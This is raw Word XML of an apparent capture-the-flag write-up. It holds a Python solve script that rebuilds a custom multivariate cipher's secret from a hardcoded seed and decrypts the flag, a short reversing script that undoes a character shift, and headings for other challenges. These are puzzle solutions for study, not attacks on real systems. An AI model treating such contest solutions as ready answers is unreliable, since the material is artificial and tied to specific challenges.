    <w:p w14:paraId="6B1197C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&gt;&gt;=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1CF9D8E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38032E1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D0C4B8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39.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^=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mod_poly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0BBB2B3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res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</w:p>
    <w:p w14:paraId="2676232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pow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1D2FECF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42.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res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mask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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A23FA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while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3570E2E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46BD8DB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res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0F2582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C2BE21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&gt;&gt;=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5A8DB98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res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A12CE0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49.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inv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0E76AA8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979AC0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ZeroDivisionError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"no inverse for 0"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BCA5DD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pow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D7EE95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8CA2EC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54.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mat_inv_K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]]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7089E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B66B95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row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n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4EE0D30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220DD6D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07F7E1A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59.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4B97AA1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4641A1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piv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</w:p>
    <w:p w14:paraId="5F494B2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9D5FC5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413EDDF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piv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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D61B5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piv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7E354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171E93E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piv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piv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0B1D0E0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4B0588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69.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invp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2C41AE3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invp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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC4D55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03912E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789790B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997CA6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f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7F3C5FB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)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A31570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61E3CC0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B18173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"singular matrix over K"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6407D6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79.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row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row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31827E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0BF549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mat_apply_K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271DA50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751253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</w:p>
    <w:p w14:paraId="3F0E35E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F36C73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1385833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0406AC1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0F04DE8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]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D9914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89.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</w:p>
    <w:p w14:paraId="5DA7E98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</w:p>
    <w:p w14:paraId="0DB7910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642917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92.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rand_affine_bijection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random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Random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2D3E56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while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True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614E32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randrange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)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5B529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try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C7C5B9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_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mat_inv_K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9D3CAC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97. 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break</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4D16792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98.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except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233813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 99.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3CF050C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proofErr w:type="gram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randrange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)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A58A93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6601CD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03F1BA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103.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affine_apply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Mb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6013B9D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Mb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCC67F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y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mat_apply_K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FBD047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y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))]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6160F06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EF412A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108.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@dataclass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547BC1E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109.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class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ACB31E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</w:p>
    <w:p w14:paraId="504578F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</w:p>
    <w:p w14:paraId="143DF7E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modulus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285CAC9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655FBD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114.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class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BAC336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init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__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spec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coeffs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Optional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]]=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083D331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spec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDDBB1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spec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proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0B5E607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spec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</w:p>
    <w:p w14:paraId="3EA8185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119.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coeffs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is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1BA8A4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proofErr w:type="gramStart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  <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7C57F3B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else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52D0A6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assert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coeffs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</w:p>
    <w:p w14:paraId="3BF5966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coeffs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7976D4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@staticmethod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6747BBF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602F30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c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7A316C5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517276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copy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[:])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7450029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129.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other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zip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other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)])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8163E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other</w:t>
      </w:r>
      <w:proofErr w:type="gram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AE3771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modulus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="135D11E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4840B7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08B840C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1F98D6E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other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579048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4EAF9A1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41B83A0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397032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139.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36186A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continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F777C1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5DFC2B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aj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443DA9D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aj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0CA9824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add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coef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5DF7000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67CA105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tmp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4DE2ECF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pow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5A8D0F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148. </w:t>
      </w:r>
      <w:proofErr w:type="gram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res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86641E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149.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self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copy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55FB9D3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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CA9CA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while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7E84E1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608B4A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res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7064A0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mul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base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752913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155.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ee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&gt;&gt;=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759A887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res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4471CC4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CB7205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158.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phi_encode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86104F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159.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assert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</w:p>
    <w:p w14:paraId="3D097E7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[:])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3046186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C236B4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162.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phi_decode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ExtElem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45D77BA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[:]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AF8EF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80D20C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165.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@dataclass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB04EC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166.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class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18CB479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</w:p>
    <w:p w14:paraId="49864C2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</w:p>
    <w:p w14:paraId="4023C43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169.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372B423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1198998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26462CC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D2FACB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90303E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3B9EA7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Added for decryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E64DBD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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E53275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proofErr w:type="gram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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471A0DA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D8A849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179.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_decompose_as_2ell_plus1_times_power_of_two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60DE5F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3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"n must be &gt;= 3"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E3CA67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</w:p>
    <w:p w14:paraId="27CA629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while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1A3437F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m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//=2; r+=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60537F5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"n is not (2*ell+1)*2^r"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E48A4B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ell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// 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E4BDB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ell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ell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394F65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"n is not (2*ell+1)*2^r"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5E6A32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ell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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0E3A6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189.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8E276F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190.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egcd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22FA2EB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2DE94E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g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y1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egcd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003D9E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y1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x1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//b)*y1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECC624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1E3A12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195.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modinv_int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24A9263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g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_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egcd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82BBA7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109C25D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"no modular inverse"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1648A1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199.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</w:p>
    <w:p w14:paraId="1911634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B1B527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build_theta_e_h_for_partition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Optional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]]=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72389D9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q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</w:p>
    <w:p w14:paraId="0102805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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5801BB4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idx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57B804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_decompose_as_2ell_plus1_times_power_of_two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DF5A43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idx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is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proofErr w:type="gram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else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3A9020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5BFCE1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"b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[{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idx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}] must be in [1, {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ell_i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}]"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A52126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209.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998252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q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CD5094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order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q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</w:p>
    <w:p w14:paraId="33D1BBA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modinv_int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order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0193E8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213.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381803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A2175E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ell_list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theta_list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h_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="40B525A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071CEB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217.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split_blocks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]]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2912DBB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pos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538350D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219.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FC16C9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pos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pos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pos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+=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ni</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6A7081A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</w:p>
    <w:p w14:paraId="792B9DF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958F27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223.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concat_blocks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chunks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0459928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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B56DE5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chunks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extend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E9DA51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</w:p>
    <w:p w14:paraId="10D4828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3A0874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228.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encrypt_public_map_F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0073846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229.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</w:p>
    <w:p w14:paraId="6AAACDF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u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affine_apply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5AD3EB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blocks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split_blocks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u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partition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24B2B8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y_chunks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28D18CF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0A1AD9E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z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phi_encode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4325F61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z_e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pow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225DB5C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y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phi_decode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z_e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01377B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y_chunks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y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5E3D0C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v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concat_blocks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y_chunks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FCDA92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239.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affine_apply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FDF278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EFB94E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setup_secret_general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seed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modulus_list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Optional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]]=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None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48CB1D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random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Random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seed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48F875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14795E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sum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24DB5F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=[]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4A039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zip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modulus_list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0479A42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!=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499B88B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"Each modulus must have length n_i+1 and end with 1"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ED7D94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249.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ExtFieldSpec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modulus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mod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69B8212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ells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thetas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build_theta_e_h_for_partition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7DBFE2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s_fwd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rand_affine_bijection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DB2E29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t_fwd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rand_affine_bijection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2AC417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ells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rs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thetas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s_fwd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t_fwd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558D8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C678E8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255.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int_to_bits_fixed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4BD2A6A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&gt;&gt;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B5052E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38A040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258.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bits_to_int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0CA11C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259.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4319F6A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|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619722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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293D7FE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375FFE0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263.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bytes_to_K_elems_general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78A064B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264.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</w:p>
    <w:p w14:paraId="3C43F5E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total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63E694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</w:p>
    <w:p w14:paraId="73599D0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total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block_bits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4FE95C3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total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4683D25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269.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x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bytes_to_long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A29596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bits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int_to_bits_fixed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total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]*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2F58942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7439333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16E15D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</w:p>
    <w:p w14:paraId="07491C7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AD5097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|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79DA1CE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3F94E7D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4E8E4BD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3FF535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279.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encrypt_bytes_general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plain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352BFB5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</w:p>
    <w:p w14:paraId="73569CF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bytes_to_K_elems_general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plain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CD161F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67A8024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336CCE9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xi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703F2EE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eta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encrypt_public_map_F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2F84EC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extend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eta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AF22A5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out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474F187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06B0E7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289.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ct_elems_to_hex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str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6168E4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</w:p>
    <w:p w14:paraId="0A5DD3C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C9133E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32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out of range (32-bit)"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98220B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not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32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raise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ValueError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out of range (32-bit)"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02E75A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6164920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6A44361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v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5DC1F1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extend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v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&gt;&gt;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j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j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78A1B68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</w:p>
    <w:p w14:paraId="6EE45EF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299.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bits_to_int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A1B0DC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Lbytes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7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//8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AED71F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payload_bytes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long_to_bytes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blocksize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23A4B0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header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to_bytes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4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"big"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to_bytes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4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"big"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15C2E4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header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hex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6867DCC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38E156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305.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encrypt_to_hex_packed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plain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str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CD849C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encrypt_bytes_general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plain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093B2E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ct_elems_to_hex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D43570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B6EA53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309.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# New functions for decryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC46BE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06D00C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hex_to_ct_elems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str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40C35CB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16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1C86F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16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16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15B597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payload_hex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16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:]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4884115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payload_bytes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fromhex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D99C15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bytes_to_long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E9A3FA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elem_count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</w:p>
    <w:p w14:paraId="5E88D3D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318.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int_to_bits_fixed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233C7B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319.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578134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12B8E95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bits_to_int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5ADCA04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CFD65F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003D619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DD6964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325.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get_affine_inverse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proofErr w:type="gram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GF2m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Tuple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]]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5119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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0E3D292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M_inv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mat_inv_K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B6193A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b_inv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mat_apply_K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96AC55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329.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0205EC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4E02A5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331.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decrypt_public_map_F_inv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eta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]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C6359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</w:p>
    <w:p w14:paraId="2D02826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t_inv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get_affine_inverse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450706B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s_inv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get_affine_inverse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s_forward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CF5A70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v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affine_apply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eta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7151EBD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blocks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split_blocks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partition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049342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u_chunks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0362301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8DC4C4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339.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z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phi_encode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vec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6667432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z_h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pow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2287A5E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u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phi_decode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z_h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8F36E7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u_chunks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append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u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DE2DC1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u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concat_blocks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u_chunks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3227C6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xi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affine_apply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u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D0A722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xi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C9FEA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43A7D1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347.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decrypt_bytes_general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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SecretStructure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-&gt;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12DDDF4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K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</w:p>
    <w:p w14:paraId="64CC882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349.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n</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="159031B0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m</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="57CEE78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out_elems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379527E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70284DB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eta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53A30E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xi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decrypt_public_map_F_inv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eta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474175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out_elems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extend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xi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4B1431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[]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F68CB2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out_elems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7246C7F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v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&amp;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((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&lt;&lt;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073754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359.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extend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int_to_bits_fixed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v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0865FC95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total_padded_bits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len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B979BE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original_bits_count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total_padded_bits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</w:p>
    <w:p w14:paraId="124584A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[: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original_bits_count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0FFDCA7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original_bytes_count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original_bits_count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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164BFC23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bits_to_int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C148F3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long_to_bytes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payload_int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original_bytes_count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BC6721E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714B39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367.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main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():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003AF87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SEED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20250829</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715A6E5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369.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8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35486856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370.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PARTITION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7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35D773D9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371.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BLIST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3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2584260C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372.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MODULI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[[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proofErr w:type="gramStart"/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proofErr w:type="gram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]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B46882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373.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"000000460000000863306b8beb63d7f7f73160467fca983fcf637c20905e1d7ca653f4a5137d672bb8c40da87994b9cc99ff5981900ae419c270973db9b078ee1a17f5bf79da2dd5aab9bbc6d38b"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791A2E5F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374.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C71E8F8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375.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S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setup_secret_general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SEED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PARTITION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MODULI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b_list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BLIST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903790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376.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hex_to_ct_elems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ct_hex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K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54753B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377.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plaintext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decrypt_bytes_general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ct_elems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pad_bits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C638094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378.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plaintext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decode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())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0048733A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379. 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6793A27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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A4765">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">380. </w:t>
      </w:r>
      <w:r w:rsidRPr="000A4765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__name__ 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0A4765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0A4765">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"__main__"</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4765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3B8F25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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A4765">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">381. </w:t>
      </w:r>
      <w:r w:rsidRPr="000A4765"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 w:rsidRPr="000A4765">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A4765">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0934D0F1" w14:textId="77777777" w:rsidR="000A4765" w:rsidRPr="000A4765" w:rsidRDefault="000A476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9400047"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A4765">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">382. </w:t>
      </w:r>
      <w:r w:rsidRPr="000A4765">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D67E90F" w14:textId="77777777" w:rsidR="006F4D65" w:rsidRDefault="006F4D65">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5983CA" w14:textId="5A0643E7" w:rsidR="0088214D" w:rsidRDefault="00587C0C" w:rsidP="00587C0C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc207539465"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Reverse</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="6B29628D" w14:textId="75B230C5" w:rsidR="00B3780B" w:rsidRPr="00B3780B" w:rsidRDefault="00B3780B" w:rsidP="00B3780B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5" w:name="_Toc207539466"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>strings-jacking</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="63DFB54A" w14:textId="0162A75E" w:rsidR="00B3780B" w:rsidRDefault="00B3780B" w:rsidP="00B3780B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3780B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40BB7BD1" wp14:editId="2DB6B1C3">
            <wp:extent cx="3467584" cy="990738"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10253048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04818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2C0F" w14:textId="63BF8CCF" w:rsidR="00C23493" w:rsidRDefault="00C23493" w:rsidP="00C23493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6" w:name="_Toc207539467"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mystery Zone</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="2F434480" w14:textId="4D1ED5B1" w:rsidR="00C23493" w:rsidRDefault="00C23493" w:rsidP="00C23493">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32F8D453" wp14:editId="510F45C4">
            <wp:extent cx="3372684" cy="3143250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1630094300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4300" name="Picture 1" descr="A screenshot of a q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225" cy="314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822A" w14:textId="583431D2" w:rsidR="003C0888" w:rsidRDefault="003C0888" w:rsidP="003C0888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7" w:name="_Toc207539468"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">No </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>need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Logical Thinking</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="6A955795" w14:textId="6E343435" w:rsidR="003C0888" w:rsidRDefault="00B9483F" w:rsidP="003C0888">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9483F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Solve script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457568C5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1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00B9483F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reverse_process_flag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transformed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4412E00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2.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original_chars</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:p>
    <w:p w14:paraId="138E8713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3.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chr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ord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c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B9483F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># subtract index+1 because Python is 0-based</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE0ABE8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4.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B9483F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i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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00B9483F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enumerate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transformed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F2FD27A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5.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38AA5B14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6.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B9483F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''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B9483F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>join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original_chars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A74D00D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7.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E5E6EFE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8. </w:t>
      </w:r>
      <w:r w:rsidRPr="00B9483F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Example usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D4F23F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 9.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transformed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gyhgyl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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‚|</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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qoj</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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\&gt;@@xqDD|zyJyg}‹…”</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9483F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r w:rsidRPr="00B9483F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ˆUD¡"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5E2AFB" w14:textId="77777777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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">10. 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original 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reverse_process_flag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B9483F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>transformed</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9483F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CBD7F20" w14:textId="03907BE4" w:rsidR="00B9483F" w:rsidRPr="00B9483F" w:rsidRDefault="00B9483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2166297"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9483F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">11. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B9483F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>print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 w:rsidRPr="00B9483F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>original</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B9483F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8D50F1" w14:textId="77777777" w:rsidR="00B3780B" w:rsidRPr="00B3780B" w:rsidRDefault="00B3780B" w:rsidP="00B3780B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26C8D724" w14:textId="77777777" w:rsidR="006F4D65" w:rsidRDefault="006F4D65">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="783BFA5E" w14:textId="51F45E0C" w:rsidR="00587C0C" w:rsidRDefault="00587C0C" w:rsidP="00587C0C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc207539469"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Misc</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="251263EA" w14:textId="6EEF036C" w:rsidR="00D9228F" w:rsidRDefault="00D9228F" w:rsidP="00D9228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9" w:name="_Toc207539470"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Poison Apple</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="04EE86BF" w14:textId="42771430" w:rsidR="00D9228F" w:rsidRPr="00D9228F" w:rsidRDefault="00D9228F" w:rsidP="00D9228F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9228F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D4E514C" wp14:editId="2B389569">
            <wp:extent cx="2191056" cy="714475"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1396178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80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323" w14:textId="0D26E011" w:rsidR="00D9228F" w:rsidRDefault="00D23FF6" w:rsidP="00D9228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0" w:name="_Toc207539471"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Flagcraft</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5B962854" w14:textId="7D90DB1A" w:rsidR="00D23FF6" w:rsidRDefault="00D23FF6" w:rsidP="00D23FF6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D23FF6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
